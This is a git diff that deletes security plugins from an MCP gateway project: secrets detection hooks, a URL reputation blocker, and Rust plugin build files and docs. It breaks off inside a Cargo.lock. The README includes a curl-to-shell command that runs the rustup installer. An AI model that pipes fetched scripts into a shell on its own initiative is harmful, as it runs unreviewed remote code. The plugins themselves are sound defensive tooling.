self._warn_on_broad_patterns() - - # Set implementation type based on Rust availability - if _RUST_AVAILABLE: - self.implementation = "Rust" - logger.info("🦀 SecretsDetectionPlugin initialized with Rust acceleration (2-7x speedup)") - else: - self.implementation = "Python" - logger.info("🐍 SecretsDetectionPlugin initialized with Python implementation") - - def _warn_on_broad_patterns(self) -> None: - """Warn when broad heuristic patterns are enabled in the plugin config.""" - enabled_broad_patterns = sorted(pattern_name for pattern_name in BROAD_PATTERNS if self._cfg.is_enabled(pattern_name)) - if enabled_broad_patterns: - logger.warning( - "Broad secrets heuristics enabled: %s. These patterns are useful for generic API key/token coverage but can increase false positives.", - ", ".join(enabled_broad_patterns), - ) - - async def prompt_pre_fetch(self, payload: PromptPrehookPayload, context: PluginContext) -> PromptPrehookResult: - """Detect secrets in prompt arguments. - - Args: - payload: Prompt payload. - context: Plugin execution context. - - Returns: - Result indicating secrets found or content redacted. - """ - count, new_args, findings = _scan_container(payload.args or {}, self._cfg) - if count >= self._cfg.min_findings_to_block and self._cfg.block_on_detection: - return PromptPrehookResult( - continue_processing=False, - violation=PluginViolation( - reason="Secrets detected", - description="Potential secrets detected in prompt arguments", - code="SECRETS_DETECTED", - details={"count": count, "examples": findings[:5]}, - ), - ) - if self._cfg.redact and new_args != (payload.args or {}): - return PromptPrehookResult(modified_payload=PromptPrehookPayload(prompt_id=payload.prompt_id, args=new_args), metadata={"secrets_redacted": True, "count": count}) - return PromptPrehookResult(metadata={"secrets_findings": findings, "count": count} if count else {}) - - async def tool_post_invoke(self, payload: ToolPostInvokePayload, context: PluginContext) -> ToolPostInvokeResult: - """Detect secrets in tool results. - - Args: - payload: Tool result payload. - context: Plugin execution context. - - Returns: - Result indicating secrets found or content redacted. - """ - count, new_result, findings = _scan_container(payload.result, self._cfg) - if count >= self._cfg.min_findings_to_block and self._cfg.block_on_detection: - return ToolPostInvokeResult( - continue_processing=False, - violation=PluginViolation( - reason="Secrets detected", - description="Potential secrets detected in tool result", - code="SECRETS_DETECTED", - details={"count": count, "examples": findings[:5]}, - ), - ) - if self._cfg.redact and new_result != payload.result: - return ToolPostInvokeResult(modified_payload=ToolPostInvokePayload(name=payload.name, result=new_result), metadata={"secrets_redacted": True, "count": count}) - return ToolPostInvokeResult(metadata={"secrets_findings": findings, "count": count} if count else {}) - - async def resource_post_fetch(self, payload: ResourcePostFetchPayload, context: PluginContext) -> ResourcePostFetchResult: - """Detect secrets in fetched resource content. - - Args: - payload: Resource post-fetch payload. - context: Plugin execution context. - - Returns: - Result indicating secrets found or content redacted. - """ - content = payload.content - # Only scan textual content - if hasattr(content, "text") and isinstance(content.text, str): - count, new_text, findings = _scan_container(content.text, self._cfg) - if count >= self._cfg.min_findings_to_block and self._cfg.block_on_detection: - return ResourcePostFetchResult( - continue_processing=False, - violation=PluginViolation( - reason="Secrets detected", - description="Potential secrets detected in resource content", - code="SECRETS_DETECTED", - details={"count": count, "examples": findings[:5]}, - ), - ) - if self._cfg.redact and new_text != content.text: - new_payload = ResourcePostFetchPayload(uri=payload.uri, content=type(content)(**{**content.model_dump(), "text": new_text})) - return ResourcePostFetchResult(modified_payload=new_payload, metadata={"secrets_redacted": True, "count": count}) - return ResourcePostFetchResult(metadata={"secrets_findings": findings, "count": count} if count else {}) - return ResourcePostFetchResult(continue_processing=True) diff --git a/plugins/url_reputation/README.md b/plugins/url_reputation/README.md deleted file mode 100644 index 43fd47b4a4..0000000000 --- a/plugins/url_reputation/README.md +++ /dev/null @@ -1,31 +0,0 @@ -# URL Reputation Plugin - -> Author: Mihai Criveti -> Version: 0.1.0 - -Blocks URLs based on configured blocked domains and string patterns before resource fetch. - -## Hooks -- resource_pre_fetch - -## Config -```yaml -config: - blocked_domains: ["malicious.example.com"] - blocked_patterns: [] -``` - -## Design -- Checks URL host against a blocked domain list (exact or subdomain match). -- Checks URL string for blocked substring patterns. -- Enforces block at `resource_pre_fetch` with structured violation details. - -## Limitations -- Static lists only; no external reputation providers. -- Substring patterns only; no regex or anchors. -- Ignores scheme/port nuances beyond simple parsing. - -## TODOs -- Add regex patterns and allowlist support. -- Optional threat-intel lookups with caching. -- Per-tenant/per-server override configuration. diff --git a/plugins/url_reputation/__init__.py b/plugins/url_reputation/__init__.py deleted file mode 100644 index 25b354ca39..0000000000 --- a/plugins/url_reputation/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# -*- coding: utf-8 -*- -"""Url Reputation Plugin. - -Location: ./plugins/url_reputation/__init__.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 - -Url Reputation plugin implementation. -""" diff --git a/plugins/url_reputation/plugin-manifest.yaml b/plugins/url_reputation/plugin-manifest.yaml deleted file mode 100644 index a5caa72095..0000000000 --- a/plugins/url_reputation/plugin-manifest.yaml +++ /dev/null @@ -1,8 +0,0 @@ -description: "Static URL reputation checks using blocked domains/patterns" -author: "Mihai Criveti" -version: "0.1.0" -available_hooks: - - "resource_pre_fetch" -default_configs: - blocked_domains: [] - blocked_patterns: [] diff --git a/plugins/url_reputation/url_reputation.py b/plugins/url_reputation/url_reputation.py deleted file mode 100644 index a7373851e6..0000000000 --- a/plugins/url_reputation/url_reputation.py +++ /dev/null @@ -1,179 +0,0 @@ -# -*- coding: utf-8 -*- -"""Location: ./plugins/url_reputation/url_reputation.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -URL Reputation Plugin. -Blocks known-bad domains or URL patterns before fetching resources. -""" - -# Future -from __future__ import annotations - -# Standard -from typing import Any, List, Set -from urllib.parse import urlparse -import logging - -# Third-Party -from pydantic import BaseModel, Field, field_validator - -# First-Party -from mcpgateway.plugins.framework import ( - Plugin, - PluginConfig, - PluginContext, - PluginViolation, - ResourcePreFetchPayload, - ResourcePreFetchResult, -) - -logger = logging.getLogger(__name__) - -# Try to import Rust-accelerated implementation -try: - from url_reputation_rust import URLReputationPlugin as URLReputationPluginRust - _RUST_AVAILABLE = True - logger.info("Rust url reputation plugin available") -except ImportError as e: - _RUST_AVAILABLE = False - logger.warning("Rust url reputation not available (will use Python): %s", e) -except Exception as e: - _RUST_AVAILABLE = False - logger.error("Unexpected error loading Rust module: %s", e, exc_info=True) - - -class URLReputationConfig(BaseModel): - """Configuration for URL reputation checks. - """ - - whitelist_domains: Set[str] = Field( - default_factory=set, - description="Domains that are always allowed, bypassing checks." - ) - allowed_patterns: List[str] = Field( - default_factory=list, - description="URL patterns that are explicitly allowed." - ) - blocked_domains: Set[str] = Field( - default_factory=set, - description="Domains that are blocked by the plugin." - ) - blocked_patterns: List[str] = Field( - default_factory=list, - description="URL patterns that are blocked by the plugin." - ) - use_heuristic_check: bool = Field( - default=False, - description="Enable heuristic checks for suspicious URLs." - ) - entropy_threshold: float = Field( - default=3.65, - description="Entropy threshold for detecting suspicious URLs." - ) - block_non_secure_http: bool = Field( - default=True, - description="Block non-HTTPS URLs if True." - ) - - @field_validator("whitelist_domains", "blocked_domains", mode="before") - @classmethod - def normalize_domains(cls, v: Any) -> Set[str]: - """Transform domains for lowercase""" - if not v: - return set() - return {d.lower() for d in v} - - -class URLReputationPlugin(Plugin): - """Static allow/deny URL reputation checks.""" - - def __init__(self, config: PluginConfig) -> None: - """Initialize the URL reputation plugin. - - Args: - config: Plugin configuration. - """ - super().__init__(config) - self._cfg = URLReputationConfig(**(config.config or {})) - if _RUST_AVAILABLE: - self.rust_plugin = URLReputationPluginRust(self._cfg) - else: - logger.warning( - "Rust plugin not available. Using Python implementation with less features; " - "Heuristic checks and regex patterns are not implemented in Python." - ) - - async def resource_pre_fetch(self, payload: ResourcePreFetchPayload, context: PluginContext) -> ResourcePreFetchResult: - """Check URL against blocked domains and patterns before fetch. - - Args: - payload: Resource pre-fetch payload. - context: Plugin execution context. - - Returns: - Result indicating whether URL is allowed or blocked. - """ - - if _RUST_AVAILABLE: - try: - result_dict = self.rust_plugin.validate_url_py(payload.uri) - return ResourcePreFetchResult(**result_dict) - except Exception as e: - logger.warning( - f"Rust plugin failed, blocking URL for security, error: {e}", - ) - return ResourcePreFetchResult( - continue_processing=False, - violation=PluginViolation( - reason="Rust validation failure", - description=f"URL {payload.uri} blocked due to internal error", - code="URL_REPUTATION_BLOCK", - details={"url": payload.uri}, - ), - ) - - # Python plugin version will be deprecated - parsed = urlparse(payload.uri) - host = parsed.hostname or "" - - if host and (host in self._cfg.whitelist_domains or any(host.endswith("." + d) for d in self._cfg.whitelist_domains)): - return ResourcePreFetchResult(continue_processing=True) - - # Block non-secure HTTP - if self._cfg.block_non_secure_http and parsed.scheme != "https": - return ResourcePreFetchResult( - continue_processing=False, - violation=PluginViolation( - reason="Blocked non secure http url", - description=f"URL {payload.uri} is blocked", - code="URL_REPUTATION_BLOCK", - details={"url": payload.uri}, - ), - ) - # Domain check - if host and any(host == d or host.endswith("." + d) for d in self._cfg.blocked_domains): - return ResourcePreFetchResult( - continue_processing=False, - violation=PluginViolation( - reason="Blocked domain", - description=f"Domain {host} is blocked", - code="URL_REPUTATION_BLOCK", - details={"domain": host}, - ), - ) - # Pattern check - uri = payload.uri - for pat in self._cfg.blocked_patterns: - if pat in uri: - return ResourcePreFetchResult( - continue_processing=False, - violation=PluginViolation( - reason="Blocked pattern", - description=f"URL matches blocked pattern: {pat}", - code="URL_REPUTATION_BLOCK", - details={"pattern": pat}, - ), - ) - return ResourcePreFetchResult(continue_processing=True) diff --git a/plugins/webhook_notification/test_config.yaml b/plugins/webhook_notification/test_config.yaml index b371e7cc20..d9d17c82c9 100644 --- a/plugins/webhook_notification/test_config.yaml +++ b/plugins/webhook_notification/test_config.yaml @@ -4,7 +4,7 @@ plugins: # PII Filter Plugin (will generate violations for testing) - name: "PIIFilter" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["tool_pre_invoke", "tool_post_invoke"] mode: "permissive" # Don't block, just detect priority: 100 @@ -16,11 +16,11 @@ plugins: block_on_detection: false log_detections: true - # Rate Limiter Plugin (will generate rate limit violations) + # Rate Limiter Plugin (requires cpex-rate-limiter package) - name: "RateLimiter" - kind: "plugins.rate_limiter.rate_limiter.RateLimiterPlugin" + kind: "cpex_rate_limiter.RateLimiterPlugin" hooks: ["tool_pre_invoke"] - mode: "permissive" # Don't block for testing + mode: "disabled" priority: 200 config: by_user: "5/m" # Low limit for easy testing diff --git a/plugins_rust/.gitignore b/plugins_rust/.gitignore deleted file mode 100644 index 56d9d37c84..0000000000 --- a/plugins_rust/.gitignore +++ /dev/null @@ -1,43 +0,0 @@ -# Rust build artifacts -target/ - -# Python build artifacts -*.pyc -__pycache__/ -*.so -*.pyd -dist/ -build/ -*.egg-info/ -.eggs/ - -# Benchmark results -benchmarks/results/*.json -benchmarks/results/*.csv - -# Test coverage -*.profdata -*.profraw -coverage/ -htmlcov/ - -# Flamegraph profiling -flamegraph.svg -cargo-flamegraph.trace -perf.data -perf.data.old - -# IDE -.vscode/ -.idea/ -*.swp -*.swo -*~ - -# OS -.DS_Store -Thumbs.db - -# Temporary files -*.tmp -*.log diff --git a/plugins_rust/MIGRATION-RUST-IMPORTS.md b/plugins_rust/MIGRATION-RUST-IMPORTS.md deleted file mode 100644 index a9593ff8a8..0000000000 --- a/plugins_rust/MIGRATION-RUST-IMPORTS.md +++ /dev/null @@ -1,142 +0,0 @@ -# Rust Plugin Import Path Migration (v1.0.0-RC1) - -## Breaking Change - -The PII filter Rust module import path has changed: - -```python -# ❌ OLD (Pre-RC1) -from plugins_rust import PIIDetectorRust - -# ✅ NEW (RC1+) -from pii_filter_rust.pii_filter_rust import PIIDetectorRust -``` - -**Note**: The double-nested import path (`pii_filter_rust.pii_filter_rust`) is correct: -- First `pii_filter_rust` = package name (from `Cargo.toml` `[lib] name`) -- Second `pii_filter_rust` = module name (from `#[pymodule]` in `lib.rs`) -- `PIIDetectorRust` = class exported via `m.add_class::()` - -## Why? - -- **Consistency**: Module name matches Cargo.toml `[lib]` name with _rust suffix -- **Clarity**: Each plugin has distinct module name -- **PyPI**: Aligns with package name `mcpgateway-pii-filter` -- **Windows Compatibility**: Removed problematic `include` directives that caused `.pyd` file conflicts - -## Who's Affected? - -- ✅ External code importing `PIIDetectorRust` directly -- ✅ Custom plugins using Rust PII detector -- ❌ Standard plugin usage (Python wrapper handles this) -- ❌ MCP Gateway core (already updated) - -## Migration - -### 1. Find Affected Code - -```bash -grep -r "from plugins_rust import" . --include="*.py" -``` - -### 2. Update Imports - -```python -# Before -from plugins_rust import PIIDetectorRust - -# After -from pii_filter_rust.pii_filter_rust import PIIDetectorRust -``` - -### 3. Reinstall Plugin - -```bash -cd plugins_rust/pii_filter -make install -``` - -### 4. Verify - -```bash -python -c "from pii_filter_rust.pii_filter_rust import PIIDetectorRust; print('✓ OK')" -``` - -## Common Scenarios - -### Direct Rust Usage - -```python -# Update import only -try: - from pii_filter_rust.pii_filter_rust import PIIDetectorRust # Changed - detector = PIIDetectorRust(config) -except ImportError: - from plugins.pii_filter.pii_filter import PIIDetector - detector = PIIDetector(config) -``` - -### Python Wrapper (Recommended) - -**No changes needed** - wrapper already updated: - -```python -from plugins.pii_filter.pii_filter import RustPIIDetector -detector = RustPIIDetector(config) -``` - -### Plugin Config - -**No changes needed** - config unchanged: - -```yaml -plugins: - - name: "PII Filter" - kind: "plugins.pii_filter.pii_filter.PIIFilter" -``` - -## Troubleshooting - -### `ImportError: No module named 'pii_filter_rust'` - -```bash -cd plugins_rust/pii_filter -make clean -make install -python -c "from pii_filter_rust.pii_filter_rust import PIIDetectorRust; print('OK')" -``` - -### `ImportError: No module named 'plugins_rust'` - -Update imports to use `pii_filter_rust` (see step 2 above). - -### Falls Back to Python - -Check logs for import errors, verify installation: - -```bash -pip list | grep mcpgateway-pii-filter -``` - -## Future Plugins - -All Rust plugins follow this pattern: - -All Rust plugins now use consistent naming with `_rust` suffix and double-nested imports: -- `from pii_filter_rust.pii_filter_rust import PIIDetectorRust` -- `from secrets_detection_rust.secrets_detection_rust import py_scan_container` -- `from encoded_exfil_detection_rust.encoded_exfil_detection_rust import py_scan_container` - -The double-nested path is required because PyO3 creates a package structure where the module name (from `#[pymodule]`) is nested inside the package name (from `Cargo.toml` `[lib] name`). - -## Resources - -- [Rust Plugins Docs](../../docs/docs/using/plugins/rust-plugins.md) -- [PII Filter README](pii_filter/README.md) -- [Changelog](../../CHANGELOG.md) - ---- - -**Difficulty**: Low -**Time**: 5-15 minutes -**Backward Compatible**: No diff --git a/plugins_rust/Makefile b/plugins_rust/Makefile deleted file mode 100644 index 9b3c71cc1c..0000000000 --- a/plugins_rust/Makefile +++ /dev/null @@ -1,337 +0,0 @@ -# Makefile for Rust Plugins -# Automatically discovers and installs all plugins (subdirectories with Cargo.toml) - -.PHONY: install clean list help build test fmt clippy doc test-python test-verbose clean-all fmt-check doc-open bench bench-build bench-compare compare check verify verify-stubs clean-stubs test-integration test-all uninstall deny - -# Discover all plugin directories containing Cargo.toml -PLUGIN_DIRS := $(shell find . -mindepth 1 -maxdepth 1 -type d -exec test -f {}/Cargo.toml \; -print | sed 's|^\./||' | sort) - -# Pattern rule for calling plugin-specific targets (common to all plugins) -# Usage: make - -# Examples: -# make pii_filter-install -# make secrets_detection-test -# make encoded_exfil_detection-build -%-build %-clean %-clean-all %-clippy %-doc %-doc-open %-fmt %-fmt-check %-help %-install %-uninstall %-test %-test-python %-test-verbose: - @plugin=$$(echo $@ | sed 's/-[^-]*$$//'); \ - target=$$(echo $@ | sed 's/^[^-]*-//'); \ - echo "Running 'make $$target' in $$plugin..."; \ - cd $$plugin && $(MAKE) $$target - -install: - @echo "Installing all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo ""; \ - echo "Installing plugin: $$plugin"; \ - (cd $$plugin && $(MAKE) install) || exit 1; \ - done - @echo "" - @echo "✓ All plugins installed successfully" - -uninstall: - @echo "Uninstalling all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Uninstalling: $$plugin"; \ - (cd $$plugin && $(MAKE) uninstall) || exit 1; \ - done - @echo "✓ All plugins uninstalled" - -clean: - @echo "Cleaning all plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Cleaning: $$plugin"; \ - (cd $$plugin && $(MAKE) clean) || exit 1; \ - done - @rm -rf target/ - -build: - @echo "Building all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Building: $$plugin"; \ - (cd $$plugin && $(MAKE) build) || exit 1; \ - done - -build-target-%: - @echo "Building all Rust plugins for target: $*..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Building $$plugin for $*..."; \ - (cd $$plugin && $(MAKE) build-target TARGET=$*) || exit 1; \ - done - -test: - @echo "Testing all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Testing: $$plugin"; \ - (cd $$plugin && $(MAKE) test) || exit 1; \ - done - -test-verbose: - @echo "Testing all Rust plugins (verbose)..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Testing: $$plugin"; \ - (cd $$plugin && $(MAKE) test-verbose) || exit 1; \ - done - -test-python: - @echo "Running Python tests for all plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Testing Python: $$plugin"; \ - (cd $$plugin && $(MAKE) test-python) || exit 1; \ - done - -fmt: - @echo "Formatting all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Formatting: $$plugin"; \ - (cd $$plugin && $(MAKE) fmt) || exit 1; \ - done - -fmt-check: - @echo "Checking format for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Checking format: $$plugin"; \ - (cd $$plugin && $(MAKE) fmt-check) || exit 1; \ - done - -clippy: - @echo "Running clippy on all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Clippy: $$plugin"; \ - (cd $$plugin && $(MAKE) clippy) || exit 1; \ - done - -doc: - @echo "Building documentation for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Building docs: $$plugin"; \ - (cd $$plugin && $(MAKE) doc) || exit 1; \ - done - -doc-open: - @echo "Building and opening documentation for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Building docs: $$plugin"; \ - (cd $$plugin && $(MAKE) doc-open) || exit 1; \ - done - -clean-all: - @echo "Deep cleaning all plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Deep cleaning: $$plugin"; \ - (cd $$plugin && $(MAKE) clean-all); \ - done - @rm -rf target/ - -bench: - @echo "Running benchmarks for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Benchmarking: $$plugin"; \ - (cd $$plugin && $(MAKE) bench) || exit 1; \ - done - -bench-build: - @echo "Compiling benchmarks for all Rust plugins without running them..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Compiling benchmark targets: $$plugin"; \ - (cd $$plugin && cargo bench --no-run) || exit 1; \ - done - -bench-compare: - @echo "Running performance comparisons for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Comparing: $$plugin"; \ - (cd $$plugin && $(MAKE) bench-compare) || exit 1; \ - done - -compare: - @echo "Running compare_performance.py for all Rust plugins (skip benchmarks)..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Comparing: $$plugin"; \ - (cd $$plugin && $(MAKE) compare) || exit 1; \ - done - -build-wheels: - @echo "Building wheels for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Building wheels for: $$plugin"; \ - echo "Cleaning python directory..."; \ - find $$plugin/python -name "*.so" -delete 2>/dev/null || true; \ - find $$plugin/python -name "*.pyd" -delete 2>/dev/null || true; \ - (cd $$plugin && uv run maturin build --release --out dist) || exit 1; \ - done - @echo "✓ All wheels built successfully" - -audit: - @echo "Running security audit for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Auditing: $$plugin"; \ - (cd $$plugin && cargo audit) || exit 1; \ - done - @echo "✓ All plugins audited successfully" - -deny: - @echo "Running cargo-deny policy checks for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Checking dependency policy: $$plugin"; \ - (cd $$plugin && cargo deny check licenses bans sources) || exit 1; \ - done - @echo "✓ All plugins passed cargo-deny" - -coverage: - @echo "Running coverage for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Running coverage for: $$plugin"; \ - cd $$plugin; \ - $(MAKE) install || exit 1; \ - if [ -f Makefile ] && grep -q "coverage:" Makefile; then \ - uv run make coverage || exit 1; \ - else \ - mkdir -p coverage; \ - cargo llvm-cov --cobertura --output-path coverage/cobertura.xml || exit 1; \ - fi; \ - cd ..; \ - done - @echo "✓ Coverage completed for all plugins" - -release: - @echo "Building and publishing release for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Building release for: $$plugin"; \ - cd $$plugin; \ - uv run maturin build --release --out dist || exit 1; \ - cd ..; \ - done - @echo "✓ Release build completed" - -release-publish: - @echo "Publishing release wheels to PyPI..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Publishing: $$plugin"; \ - cd $$plugin; \ - if [ -n "$$MATURIN_PYPI_TOKEN" ]; then \ - uv run maturin publish --username __token__ --password "$$MATURIN_PYPI_TOKEN" || exit 1; \ - else \ - echo "⚠️ MATURIN_PYPI_TOKEN not set, skipping publish"; \ - fi; \ - cd ..; \ - done - @echo "✓ Release published" - -check: - @echo "Running all checks for all Rust plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Checking: $$plugin"; \ - (cd $$plugin && $(MAKE) check-all) || exit 1; \ - done - -verify: - @echo "Verifying Rust plugin installations..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Verifying: $$plugin"; \ - (cd $$plugin && $(MAKE) verify) || exit 1; \ - done - -clean-stubs: - @echo "Cleaning stub files for all plugins..." - @for plugin in $(PLUGIN_DIRS); do \ - echo "Cleaning stubs: $$plugin"; \ - find $$plugin/python -name "__init__.pyi" -type f -delete 2>/dev/null || true; \ - done - @echo "✓ All stub files cleaned" - -verify-stubs: - @echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" - @echo "Running: make rust-verify-stubs" - @echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" - @echo "Verifying stub files and pyproject.toml for all plugins..." - @echo "" - @for plugin in $(PLUGIN_DIRS); do \ - echo ""; \ - echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"; \ - echo "Checking plugin: $$plugin"; \ - echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"; \ - if [ ! -f "$$plugin/pyproject.toml" ]; then \ - echo "❌ ERROR: pyproject.toml not found in $$plugin"; \ - exit 1; \ - fi; \ - echo "✅ pyproject.toml exists"; \ - pyi_file=$$(find $$plugin/python -name "__init__.pyi" 2>/dev/null | head -1); \ - if [ -z "$$pyi_file" ]; then \ - echo "❌ ERROR: No __init__.pyi file found in $$plugin/python"; \ - echo " Run 'make rust-install' to generate stub files"; \ - exit 1; \ - fi; \ - if [ ! -s "$$pyi_file" ]; then \ - echo "❌ ERROR: Stub file is empty: $$pyi_file"; \ - exit 1; \ - fi; \ - echo "✅ Stub file exists: $$pyi_file"; \ - if ! grep -q "def \|class " "$$pyi_file"; then \ - echo "⚠️ WARNING: Stub file may be incomplete (no functions or classes found)"; \ - fi; \ - echo "✅ $$plugin verification complete"; \ - done - @echo "" - @echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" - @echo "✅ All plugins verified successfully!" - @echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" - -test-all: test test-python - @echo "✓ All tests completed successfully" - -list: - @echo "Discovered plugins:" - @for plugin in $(PLUGIN_DIRS); do \ - echo " - $$plugin"; \ - done - -help: - @echo "Available targets (run on ALL plugins):" - @echo " make install - Install all Rust plugins" - @echo " make uninstall - Uninstall all Rust plugins" - @echo " make build - Build all Rust plugins" - @echo " make test - Test all Rust plugins" - @echo " make test-verbose - Test all plugins (verbose)" - @echo " make test-python - Run Python tests for all plugins" - @echo " make test-integration - Run integration tests for all plugins" - @echo " make test-all - Run all tests (Rust + Python)" - @echo " make clean - Clean all build artifacts" - @echo " make clean-all - Deep clean all plugins" - @echo " make fmt - Format all plugin code" - @echo " make fmt-check - Check formatting for all plugins" - @echo " make clippy - Run clippy on all plugins" - @echo " make check - Run all checks (fmt, clippy, test)" - @echo " make bench - Run benchmarks for all plugins" - @echo " make bench-compare - Run performance comparisons (with benchmarks)" - @echo " make compare - Run compare_performance.py only (skip benchmarks)" - @echo " make verify - Verify all plugin installations" - @echo " make verify-stubs - Verify stub generation and pyproject.toml" - @echo " make clean-stubs - Remove all generated stub files" - @echo " make doc - Build documentation for all plugins" - @echo " make doc-open - Build and open docs for all plugins" - @echo " make list - List discovered plugins" - @echo "" - @echo "Plugin-specific targets (use -):" - @echo " make -build - Build specific plugin" - @echo " make -clean - Clean specific plugin" - @echo " make -clean-all - Clean all plugin artifacts" - @echo " make -clippy - Run clippy on plugin" - @echo " make -doc - Build plugin documentation" - @echo " make -doc-open - Build and open plugin docs" - @echo " make -fmt - Format plugin code" - @echo " make -fmt-check - Check plugin code formatting" - @echo " make -help - Show plugin-specific help" - @echo " make -install - Install specific plugin" - @echo " make -uninstall - Uninstall specific plugin" - @echo " make -test - Test specific plugin" - @echo " make -test-python - Run Python tests for plugin" - @echo " make -test-verbose - Run verbose tests for plugin" - @echo "" - @echo "Examples:" - @echo " make install # Install all plugins" - @echo " make test # Test all plugins" - @echo " make pii_filter-install # Install only pii_filter" - @echo " make secrets_detection-test # Test only secrets_detection" - @echo " make encoded_exfil_detection-build # Build only encoded_exfil_detection" - -.DEFAULT_GOAL := install diff --git a/plugins_rust/README.md b/plugins_rust/README.md deleted file mode 100644 index ddfb675b26..0000000000 --- a/plugins_rust/README.md +++ /dev/null @@ -1,83 +0,0 @@ -# Rust-Accelerated ContextForge Plugins - -High-performance Rust implementations of compute-intensive ContextForge plugins, built with PyO3 for seamless Python integration. - -## 🚀 Performance - -Rust plugins deliver 5-10x speedup over Python implementations for compute-intensive operations. - -## 📁 Structure - -Each plugin is fully independent with its own directory: - -``` -plugins_rust/ -├── pii_filter/ # PII detection and masking -│ ├── Cargo.toml -│ ├── pyproject.toml -│ ├── Makefile -│ └── src/ -├── secrets_detection/ # Secret scanning -│ ├── Cargo.toml -│ ├── Makefile -│ └── src/ -└── encoded_exfil_detection/ # Encoded exfiltration detection - ├── Cargo.toml - └── src/ -``` - -## 📦 Installation - -```bash -# Install Rust toolchain -curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh - -# Build all plugins -cd plugins_rust && make install - -# Or build specific plugin -cd pii_filter && make install -``` - -## 🔧 Development - -```bash -# Per-plugin commands (run from plugin directory) -make install # Install plugin -make test # Run tests -make bench # Run benchmarks -make fmt # Format code -make clippy # Lint - -# All plugins (run from plugins_rust directory) -make test # Test all -make fmt # Format all -make clippy # Lint all -``` - -## 🧪 Verification - -```bash -# Verify installation -python -c "from pii_filter import PIIDetectorRust; print('OK')" - -# Security audit -cd plugins_rust/pii_filter && cargo audit -``` - -Rust plugins auto-activate with graceful Python fallback. Start gateway normally with `make dev` or `make serve`. - -## 📚 Resources - -- Plugin-specific docs: `plugins_rust/[plugin_name]/README.md` -- Full docs: `docs/docs/using/plugins/rust-plugins.md` - -## 🤝 Contributing - -```bash -cargo fmt && cargo clippy && cargo test # Before committing -``` - -## 📝 License - -Apache License 2.0 - See [LICENSE](../LICENSE) diff --git a/plugins_rust/encoded_exfil_detection/Cargo.lock b/plugins_rust/encoded_exfil_detection/Cargo.lock deleted file mode 100644 index 95293ae54a..0000000000 --- a/plugins_rust/encoded_exfil_detection/Cargo.lock +++ /dev/null @@ -1,1383 +0,0 @@ -# This file is automatically @generated by Cargo. -# It is not intended for manual editing. -version = 4 - -[[package]] -name = "aho-corasick" -version = "1.1.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301" -dependencies = [ - "memchr", -] - -[[package]] -name = "alloca" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5a7d05ea6aea7e9e64d25b9156ba2fee3fdd659e34e41063cd2fc7cd020d7f4" -dependencies = [ - "cc", -] - -[[package]] -name = "android_system_properties" -version = "0.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311" -dependencies = [ - "libc", -] - -[[package]] -name = "anes" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b46cbb362ab8752921c97e041f5e366ee6297bd428a31275b9fcf1e380f7299" - -[[package]] -name = "anstyle" -version = "1.0.13" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5192cca8006f1fd4f7237516f40fa183bb07f8fbdfedaa0036de5ea9b0b45e78" - -[[package]] -name = "anyhow" -version = "1.0.101" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5f0e0fee31ef5ed1ba1316088939cea399010ed7731dba877ed44aeb407a75ea" - -[[package]] -name = "autocfg" -version = "1.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" - -[[package]] -name = "base64" -version = 